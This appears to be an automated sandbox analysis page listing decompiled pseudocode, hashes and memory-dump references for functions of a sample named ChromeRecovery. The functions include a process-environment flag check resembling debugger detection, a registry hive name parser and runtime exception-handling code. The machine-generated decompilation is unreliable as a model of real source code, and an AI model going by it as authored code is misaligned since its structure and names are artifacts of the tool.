Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0C110BB7241D4183DE568B3DD8BC7BBA395EBC532072C427AD0714B658D122E7459B00

Uniqueness

Uniqueness Score: -1.00%

Function 00C89665 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C89665(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00C8A956(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x00c89672
0x00c89674
0x00c89677
0x00c8967a
0x00c8967d
0x00c8968e
0x00c89690
0x00c8967f
0x00c89683
0x00c8968c
0x00000000
0x00000000
0x00c8968c
0x00c89695

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee4aa11dc8566ed2d6e3cdea466f4b40f0607a7aea44a1bcf6c4a1883a7f50f
Instruction ID: de7dfeaa973ac1a9b03dcc49f1494fc94caa2b7b9d3ace657437875b4b50ed4e
Opcode Fuzzy Hash: eee4aa11dc8566ed2d6e3cdea466f4b40f0607a7aea44a1bcf6c4a1883a7f50f
Instruction Fuzzy Hash: D9E08C72A15238EBCB15EB88C904D9AF3FCEB44B44B1A4096F501E3200D670DE00E7D4

Uniqueness

Uniqueness Score: -1.00%

Function 00C83E6C Relevance: .0, Instructions: 12
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C83E6C(void* __ecx, void* __eflags) {

				if(E00C89665(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x00c83e74
0x00c83e8d
0x00c83e88
0x00c83e8a
0x00c83e8a

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ccb343fa1793e8f52bd0caeee8c3c51825ae780837d8b6eb6de58d27c9d7555
Instruction ID: 78d5b77e33c8eb75441c646e54a21c151d6579637be03d8ffa5720aea8586795
Opcode Fuzzy Hash: 1ccb343fa1793e8f52bd0caeee8c3c51825ae780837d8b6eb6de58d27c9d7555
Instruction Fuzzy Hash: 05C08034401D5446CD35651081B17743354E391B89F44148CC81707641C61D5E43D744

Uniqueness

Uniqueness Score: -1.00%

Function 00C789EB Relevance: 31.6, APIs: 10, Strings: 11, Instructions: 125
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00C789EB(intOrPtr* __ecx, void* __edx, void* __eflags) {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				void* __ebx;
				void* __esi;
				void* _t37;
				void* _t53;
				intOrPtr* _t58;
				WCHAR* _t59;

				_t53 = __edx;
				_t58 = __ecx;
				_v12 = 0x200;
				_t37 = 0;
				_t55 = E00C77745( *__ecx);
				E00C71AD8( &_v8, _t53, E00C713D8());
				if(_t16 != 0xffffffff) {
					E00C713C0(E00C74860( &_v8, _t58, E00C7680B(0, _t58, _t53,  &_v16, _t55)), _v16 - 0x10);
					E00C713C0(E00C74860(_t58, _t58, E00C76850(_t58, _t53,  &_v16,  *((intOrPtr*)( *_t58 - 0xc)) - _t55 - 1)), _v16 - 0x10);
				} else {
					E00C74860( &_v8, _t58, _t58);
					_push(E00C83694(0xca12c8));
					L00C71A21(_t58, _t53, 0xca12c8);
				}
				_t59 = _v8;
				if(lstrcmpiW(_t59, L"HKLM") == 0 || lstrcmpiW(_t59, L"HKEY_LOCAL_MACHINE") == 0) {
					L14:
					_t37 = 0x80000002;
				} else {
					if(lstrcmpiW(_t59, L"HKCU") == 0 || lstrcmpiW(_t59, L"HKEY_CURRENT_USER") == 0) {
						_t37 = 0x80000001;
					} else {
						if(lstrcmpiW(_t59, L"HKU") == 0 || lstrcmpiW(_t59, L"HKEY_USERS") == 0) {
							_t37 = 0x80000003;
						} else {
							if(lstrcmpiW(_t59, L"HKCR") == 0 || lstrcmpiW(_t59, L"HKEY_CLASSES_ROOT") == 0) {
								_t37 = 0x80000000;
							} else {
								if(lstrcmpiW(_t59, L"HKLM[64]") == 0 || lstrcmpiW(_t59, L"HKEY_LOCAL_MACHINE[64]") == 0) {
									_v12 = 0x100;
									goto L14;
								}
							}
						}
					}
				}
				_t14 = _t59 - 0x10; // -16
				E00C713C0(_t31, _t14);
				return _t37;
			}

0x00c789eb
0x00c789f3
0x00c789f5
0x00c789fd
0x00c78a06
0x00c78a11
0x00c78a19
0x00c78a56
0x00c78a7d
0x00c78a1b
0x00c78a1f
0x00c78a30
0x00c78a34
0x00c78a34
0x00c78a82
0x00c78a95
0x00c78b0e
0x00c78b0e
0x00c78aa3
0x00c78aad
0x00c78b33
0x00c78abf
0x00c78ac9
0x00c78b2c
0x00c78ad7
0x00c78ae1
0x00c78b25
0x00c78aef
0x00c78af9
0x00c78b07
0x00000000
0x00c78b07
0x00c78af9
0x00c78ae1
0x00c78ac9
0x00c78aad
0x00c78b13
0x00c78b16
0x00c78b24

APIs

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

lstrcmpiW.KERNEL32(00000000,HKLM), ref: 00C78A91
lstrcmpiW.KERNEL32(00000000,HKEY_LOCAL_MACHINE), ref: 00C78A9D
lstrcmpiW.KERNEL32(00000000,HKCU), ref: 00C78AA9
lstrcmpiW.KERNEL32(00000000,HKEY_CURRENT_USER), ref: 00C78AB9
lstrcmpiW.KERNEL32(00000000,HKU), ref: 00C78AC5
lstrcmpiW.KERNEL32(00000000,HKEY_USERS), ref: 00C78AD1
lstrcmpiW.KERNEL32(00000000,HKCR), ref: 00C78ADD
lstrcmpiW.KERNEL32(00000000,HKEY_CLASSES_ROOT), ref: 00C78AE9
lstrcmpiW.KERNEL32(00000000,HKLM[64]), ref: 00C78AF5
lstrcmpiW.KERNEL32(00000000,HKEY_LOCAL_MACHINE[64]), ref: 00C78B01

Strings

HKEY_USERS, xrefs: 00C78ACB
HKEY_LOCAL_MACHINE, xrefs: 00C78A97
HKEY_LOCAL_MACHINE[64], xrefs: 00C78AFB
IsEnrolledToDomain, xrefs: 00C789F1
HKEY_CURRENT_USER, xrefs: 00C78AB3
HKU, xrefs: 00C78ABF
HKLM, xrefs: 00C78A8B
HKCU, xrefs: 00C78AA3
HKEY_CLASSES_ROOT, xrefs: 00C78AE3
HKCR, xrefs: 00C78AD7
HKLM[64], xrefs: 00C78AEF

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: lstrcmpi$HeapProcess
String ID: HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_LOCAL_MACHINE[64]$HKEY_USERS$HKLM$HKLM[64]$HKU$IsEnrolledToDomain
API String ID: 3832622189-4218959534
Opcode ID: a1ddbee9410ce54b48eef76b9c8eaafd13a585267dee241cfd984757944c4a2f
Instruction ID: b8ec7262f7142331e6904728759acb84fff4ddd1c9162c4137e1ff358f8730d7
Opcode Fuzzy Hash: a1ddbee9410ce54b48eef76b9c8eaafd13a585267dee241cfd984757944c4a2f
Instruction Fuzzy Hash: 23317CA178020AB7DB04B778CC45EAF729C9F89B94B14C224F915E31C1DF64DF0996B5

Uniqueness

Uniqueness Score: -1.00%

Function 00C8221B Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00C8221B(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t200;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t223;
				signed int _t228;
				void* _t230;
				signed int _t231;
				void* _t234;
				signed char _t237;
				intOrPtr* _t242;
				void* _t245;
				signed int* _t247;
				signed int _t248;
				intOrPtr _t249;
				signed int _t250;
				void* _t255;
				void* _t260;
				void* _t261;
				signed char* _t268;
				intOrPtr* _t269;
				signed char _t270;
				signed int _t271;
				signed int _t272;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;
				signed char _t281;
				signed int _t285;
				signed int _t286;
				intOrPtr _t289;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed int _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t326;
				void* _t328;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;

				_t296 = __edx;
				_t273 = __ecx;
				_push(_t315);
				_t301 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t200 = E00C82EF1(_a8, _a16, _t301);
				_t331 = _t330 + 0xc;
				_v16 = _t200;
				if(_t200 < 0xffffffff || _t200 >= _t301[1]) {
					L67:
					_t201 = E00C84C30(_t268, _t273, _t296, _t301, _t315, _t354);
					asm("int3");
					_t328 = _t331;
					_t332 = _t331 - 0x38;
					_push(_t268);
					_t269 = _v116;
					if( *_t269 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00C819CC(_t269, _t273, _t296, _t301, _t315);
						if( *((intOrPtr*)(_t202 + 8)) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							if( *((intOrPtr*)(E00C819CC(_t269, _t273, _t296, 0, _t315) + 8)) != _t315 &&  *_t269 != 0xe0434f4d &&  *_t269 != 0xe0434352) {
								_t214 = E00C816D7(_t269, _a4, _a8, _a12, _a16, _a24, _a28);
								_t332 = _t332 + 0x1c;
								if(_t214 != 0) {
									L84:
									return _t214;
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						if( *((intOrPtr*)(_t203 + 0xc)) > 0) {
							_push(_a24);
							E00C81609(_t269, _t273, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t333 = _t332 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t275 = _t298 * 0x14;
							_v16 = _t275;
							do {
								_t276 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t275, _t276 << 2);
								_t333 = _t333 + 0xc;
								if(_v64 <= _t217 && _t217 <= _v60) {
									_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
									_t281 = _t220[4];
									if(_t281 == 0 ||  *((char*)(_t281 + 8)) == 0) {
										if(( *_t220 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00C8219B(_t298, _t269, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
											_t298 = _v12;
											_t333 = _t333 + 0x30;
										}
									}
								}
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t275 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t275;
							} while (_t298 < _v32);
							goto L84;
						}
						E00C84C30(_t269, _t273, _t296, 0, _t315, __eflags);
						asm("int3");
						_push(_t328);
						_t297 = _v188;
						_push(_t269);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t274 = _t205 + 8;
							__eflags =  *_t274;
							if( *_t274 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t270 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t270;
									if(_t205 == _t270) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t270 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t271 =  *_t274;
											__eflags = _t271 -  *_t209;
											if(_t271 !=  *_t209) {
												break;
											}
											__eflags = _t271;
											if(_t271 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t272 =  *((intOrPtr*)(_t274 + 1));
												__eflags = _t272 -  *((intOrPtr*)(_t209 + 1));
												if(_t272 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t274 = _t274 + 2;
													_t209 = _t209 + 2;
													__eflags = _t272;
													if(_t272 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t268 = _a4;
					if( *_t268 != 0xe06d7363 || _t268[0x10] != 3 || _t268[0x14] != 0x19930520 && _t268[0x14] != 0x19930521 && _t268[0x14] != 0x19930522) {
						_t315 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t315 = 0;
						if(_t268[0x1c] != 0) {
							L24:
							_t273 = _a12;
							_v12 = _t273;
							goto L26;
						} else {
							_t223 = E00C819CC(_t268, _t273, _t296, _t301, 0);
							if( *((intOrPtr*)(_t223 + 0x10)) == 0) {
								L62:
								return _t223;
							} else {
								_t268 =  *(E00C819CC(_t268, _t273, _t296, _t301, 0) + 0x10);
								_t255 = E00C819CC(_t268, _t273, _t296, _t301, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t255 + 0x14));
								if(_t268 == 0 ||  *_t268 == 0xe06d7363 && _t268[0x10] == 3 && (_t268[0x14] == 0x19930520 || _t268[0x14] == 0x19930521 || _t268[0x14] == 0x19930522) && _t268[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00C819CC(_t268, _t273, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L25:
										_t273 = _v12;
										_t200 = _v16;
										L26:
										_v56 = _t301;
										_v52 = _t315;
										__eflags =  *_t268 - 0xe06d7363;
										if( *_t268 != 0xe06d7363) {
											L58:
											__eflags = _t301[3] - _t315;
											if(_t301[3] <= _t315) {
												goto L61;
											} else {
												__eflags = _a24;
												if(__eflags != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t200);
													_push(_t301);
													_push(_a16);
													_push(_t273);
													_push(_a8);
													_push(_t268);
													L68();
													_t331 = _t331 + 0x20;
													goto L61;
												}
											}
										} else {
											__eflags = _t268[0x10] - 3;
											if(_t268[0x10] != 3) {
												goto L58;
											} else {
												__eflags = _t268[0x14] - 0x19930520;
												if(_t268[0x14] == 0x19930520) {
													L31:
													__eflags = _t301[3] - _t315;
													if(_t301[3] > _t315) {
														_push(_a28);
														E00C81609(_t268, _t273, _t301, _t315,  &_v72,  &_v56, _t200, _a16, _t301);
														_t296 = _v68;
														_t331 = _t331 + 0x18;
														_t242 = _v72;
														_v48 = _t242;
														_v20 = _t296;
														__eflags = _t296 - _v60;
														if(_t296 < _v60) {
															_t285 = _t296 * 0x14;
															__eflags = _t285;
															_v36 = _t285;
															do {
																_t286 = 5;
																_t245 = memcpy( &_v108,  *((intOrPtr*)( *_t242 + 0x10)) + _t285, _t286 << 2);
																_t331 = _t331 + 0xc;
																__eflags = _v108 - _t245;
																if(_v108 <= _t245) {
																	__eflags = _t245 - _v104;
																	if(_t245 <= _v104) {
																		_t289 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t247 =  *(_t268[0x1c] + 0xc);
																			_t299 =  *_t247;
																			_t248 =  &(_t247[1]);
																			__eflags = _t248;
																			_v40 = _t248;
																			_t249 = _v92;
																			_v44 = _t299;
																			_v28 = _t249;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t314 = _v40;
																				_t326 = _t299;
																				__eflags = _t326;
																				if(_t326 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t268[0x1c]);
																						_t250 =  &_v88;
																						_push( *_t314);
																						_push(_t250);
																						L87();
																						_t331 = _t331 + 0xc;
																						__eflags = _t250;
																						if(_t250 != 0) {
																							break;
																						}
																						_t326 = _t326 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t326;
																						if(_t326 > 0) {
																							continue;
																						} else {
																							_t289 = _v24;
																							_t249 = _v28;
																							_t299 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E00C8219B(_t299, _t268, _a8, _v12, _a16, _a20,  &_v88,  *_t314,  &_v108, _a28, _a32);
																					_t331 = _t331 + 0x30;
																				}
																				L45:
																				_t296 = _v20;
																				goto L46;
																				L42:
																				_t289 = _t289 + 1;
																				_t249 = _t249 + 0x10;
																				_v24 = _t289;
																				_v28 = _t249;
																				__eflags = _t289 - _v96;
																			} while (_t289 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t296 = _t296 + 1;
																_t242 = _v48;
																_t285 = _v36 + 0x14;
																_v20 = _t296;
																_v36 = _t285;
																__eflags = _t296 - _v60;
															} while (_t296 < _v60);
															_t301 = _a20;
															_t315 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00C82F1C(__eflags);
														_t273 = _t268;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L61:
														_t223 = E00C819CC(_t268, _t273, _t296, _t301, _t315);
														__eflags =  *((intOrPtr*)(_t223 + 0x1c)) - _t315;
														if(__eflags != 0) {
															goto L67;
														} else {
															goto L62;
														}
													} else {
														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
														if(( *_t301 & 0x1fffffff) < 0x19930521) {
															goto L61;
														} else {
															__eflags = _t301[7];
															if(_t301[7] != 0) {
																L55:
																__eflags = _t301[8] >> 0x00000002 & 0x00000001;
																if(__eflags != 0) {
																	goto L67;
																} else {
																	_push(_t301[7]);
																	_t228 = E00C82C1A(_t268, _t301, _t315, _t268);
																	_pop(_t273);
																	__eflags = _t228;
																	if(_t228 == 0) {
																		goto L64;
																	} else {
																		goto L61;
																	}
																}
															} else {
																_t237 = _t301[8] >> 2;
																__eflags = _t237 & 0x00000001;
																if((_t237 & 0x00000001) == 0) {
																	goto L61;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L61;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t268[0x14] - 0x19930521;
													if(_t268[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t268[0x14] - 0x19930522;
														if(_t268[0x14] != 0x19930522) {
															goto L58;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E00C819CC(_t268, _t273, _t296, _t301, _t315) + 0x1c));
										_t260 = E00C819CC(_t268, _t273, _t296, _t301, _t315);
										_push(_v20);
										 *(_t260 + 0x1c) = _t315;
										_t261 = E00C82C1A(_t268, _t301, _t315, _t268);
										_pop(_t273);
										if(_t261 != 0) {
											goto L25;
										} else {
											_t301 = _v20;
											_t352 =  *_t301 - _t315;
											if( *_t301 > _t315) {
												_t291 = _t315;
												_v20 = _t315;
												while(E00C828B3( *((intOrPtr*)(_t291 + _t301[1] + 4)), _t352, 0xca8c78) == 0) {
													_t315 = _t315 + 1;
													_t291 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t354 = _t315 -  *_t301;
													if(_t315 <  *_t301) {
														continue;
													} else {
													}
													goto L67;
												}
												_push(1);
												_push(_t268);
												E00C82F1C(__eflags);
												_t273 =  &_v68;
												E00C8289B( &_v68);
												E00C81560( &_v68, 0xca675c);
												L64:
												 *(E00C819CC(_t268, _t273, _t296, _t301, _t315) + 0x10) = _t268;
												_t230 = E00C819CC(_t268, _t273, _t296, _t301, _t315);
												_t273 = _v12;
												 *(_t230 + 0x14) = _v12;
												_t231 = _a32;
												__eflags = _t231;
												if(_t231 == 0) {
													_t231 = _a8;
												}
												E00C817ED(_t273, _t231, _t268);
												E00C82B1A(_a8, _a16, _t301);
												_t234 = E00C82CD7(_t301);
												_t331 = _t331 + 0x10;
												_push(_t234);
												E00C82A96(_t268, _t273, _t296, _t301, _t315, __eflags);
											}
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x00c8221b
0x00c8221b
0x00c82222
0x00c82224
0x00c8222d
0x00c82233
0x00c82236
0x00c8223b
0x00c8223e
0x00c82244
0x00c825b4
0x00c825b4
0x00c825b9
0x00c825bb
0x00c825bd
0x00c825c0
0x00c825c1
0x00c825ca
0x00c826e9
0x00c825d0
0x00c825d0
0x00c825d1
0x00c825d2
0x00c825dc
0x00c825df
0x00c825e5
0x00c825ef
0x00c82614
0x00c82619
0x00c8261e
0x00c826e5
0x00000000
0x00c826e6
0x00c8261e
0x00c825ef
0x00c82624
0x00c82627
0x00c8262a
0x00c82630
0x00c82636
0x00c82648
0x00c8264d
0x00c82650
0x00c82653
0x00c82656
0x00c82659
0x00c8265f
0x00000000
0x00000000
0x00c82665
0x00c82668
0x00c8266b
0x00c8267a
0x00c8267b
0x00c8267b
0x00c82680
0x00c82693
0x00c82695
0x00c8269a
0x00c826a5
0x00c826a7
0x00c826a9
0x00c826c5
0x00c826ca
0x00c826cd
0x00c826cd
0x00c826a5
0x00c8269a
0x00c826d3
0x00c826d4
0x00c826d7
0x00c826da
0x00c826dd
0x00c826e0
0x00000000
0x00c8266b
0x00c826ea
0x00c826ef
0x00c826f0
0x00c826f3
0x00c826f6
0x00c826f7
0x00c826f8
0x00c826f9
0x00c826fc
0x00c826fe
0x00c82776
0x00c82778
0x00c82778
0x00c82700
0x00c82700
0x00c82703
0x00c82706
0x00000000
0x00c82708
0x00c82708
0x00c8270b
0x00c8270e
0x00c82715
0x00c82715
0x00c82718
0x00c8271a
0x00c8271c
0x00c8274e
0x00c8274e
0x00c82751
0x00c82758
0x00c82758
0x00c8275b
0x00c8275e
0x00c82765
0x00c82765
0x00c82768
0x00c8276f
0x00c82771
0x00c82771
0x00c8276a
0x00c8276a
0x00c8276d
0x00000000
0x00000000
0x00c8276d
0x00c82760
0x00c82760
0x00c82763
0x00000000
0x00000000
0x00c82763
0x00c82753
0x00c82753
0x00c82756
0x00000000
0x00000000
0x00c82756
0x00c82772
0x00c8271e
0x00c8271e
0x00c8271e
0x00c82721
0x00c82721
0x00c82723
0x00c82725
0x00000000
0x00000000
0x00c82727
0x00c82729
0x00c8273d
0x00c8273d
0x00c8272b
0x00c8272b
0x00c8272e
0x00c82731
0x00000000
0x00c82733
0x00c82733
0x00c82736
0x00c82739
0x00c8273b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8273b
0x00c82731
0x00c82746
0x00c82746
0x00c82748
0x00000000
0x00c8274a
0x00c8274a
0x00c8274a
0x00000000
0x00c82748
0x00c82741
0x00c82743
0x00c82743
0x00000000
0x00c82743
0x00c82710
0x00c82710
0x00c82713
0x00000000
0x00000000
0x00000000
0x00000000
0x00c82713
0x00c8270e
0x00c82706
0x00c82779
0x00c8277d
0x00c8277d
0x00c82253
0x00c82253
0x00c8225c
0x00c8235d
0x00c8235d
0x00000000
0x00c8228b
0x00c8228b
0x00c82290
0x00c8235f
0x00c8235f
0x00c82362
0x00000000
0x00c82296
0x00c82296
0x00c8229e
0x00c82550
0x00c82554
0x00c822a4
0x00c822a9
0x00c822ac
0x00c822b1
0x00c822b8
0x00c822bd
0x00000000
0x00c822f5
0x00c822fd
0x00c82367
0x00c82367
0x00c8236a
0x00c8236d
0x00c8236d
0x00c82370
0x00c82373
0x00c82379
0x00c8251f
0x00c8251f
0x00c82522
0x00000000
0x00c82524
0x00c82524
0x00c82528
0x00000000
0x00c8252e
0x00c8252e
0x00c82531
0x00c82534
0x00c82535
0x00c82536
0x00c82539
0x00c8253a
0x00c8253d
0x00c8253e
0x00c82543
0x00000000
0x00c82543
0x00c82528
0x00c8237f
0x00c8237f
0x00c82383
0x00000000
0x00c82389
0x00c82389
0x00c82390
0x00c823a8
0x00c823a8
0x00c823ab
0x00c823b1
0x00c823c1
0x00c823c6
0x00c823c9
0x00c823cc
0x00c823cf
0x00c823d2
0x00c823d5
0x00c823d8
0x00c823de
0x00c823de
0x00c823e1
0x00c823e4
0x00c823f3
0x00c823f4
0x00c823f4
0x00c823f6
0x00c823f9
0x00c823ff
0x00c82402
0x00c82408
0x00c8240a
0x00c8240d
0x00c82410
0x00c82419
0x00c8241c
0x00c8241e
0x00c8241e
0x00c82421
0x00c82424
0x00c82427
0x00c8242a
0x00c8242d
0x00c82432
0x00c82433
0x00c82434
0x00c82435
0x00c82436
0x00c82439
0x00c8243b
0x00c8243d
0x00000000
0x00c8243f
0x00c8243f
0x00c8243f
0x00c82442
0x00c82445
0x00c82447
0x00c82448
0x00c8244d
0x00c82450
0x00c82452
0x00000000
0x00000000
0x00c82454
0x00c82455
0x00c82458
0x00c8245a
0x00000000
0x00c8245c
0x00c8245c
0x00c8245f
0x00c82462
0x00000000
0x00c82462
0x00000000
0x00c8245a
0x00c82476
0x00c8247c
0x00c82480
0x00c8249d
0x00c824a2
0x00c824a2
0x00c824a5
0x00c824a5
0x00000000
0x00c82465
0x00c82465
0x00c82466
0x00c82469
0x00c8246c
0x00c8246f
0x00c8246f
0x00000000
0x00c82474
0x00c82410
0x00c82402
0x00c824a8
0x00c824ab
0x00c824ac
0x00c824af
0x00c824b2
0x00c824b5
0x00c824b8
0x00c824b8
0x00c824c1
0x00c824c4
0x00c824c4
0x00c824c4
0x00c823d8
0x00c824c6
0x00c824ca
0x00c824cc
0x00c824cf
0x00c824d5
0x00c824d5
0x00c824d6
0x00c824da
0x00c82546
0x00c82546
0x00c8254b
0x00c8254e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c824dc
0x00c824e3
0x00c824e8
0x00000000
0x00c824ea
0x00c824ea
0x00c824ee
0x00c82500
0x00c82506
0x00c82508
0x00000000
0x00c8250e
0x00c8250e
0x00c82512
0x00c82518
0x00c82519
0x00c8251b
0x00000000
0x00c8251d
0x00000000
0x00c8251d
0x00c8251b
0x00c824f0
0x00c824f3
0x00c824f6
0x00c824f8
0x00000000
0x00c824fa
0x00c824fa
0x00c824fe
0x00000000
0x00000000
0x00000000
0x00000000
0x00c824fe
0x00c824f8
0x00c824ee
0x00c824e8
0x00c82392
0x00c82392
0x00c82399
0x00000000
0x00c8239b
0x00c8239b
0x00c823a2
0x00000000
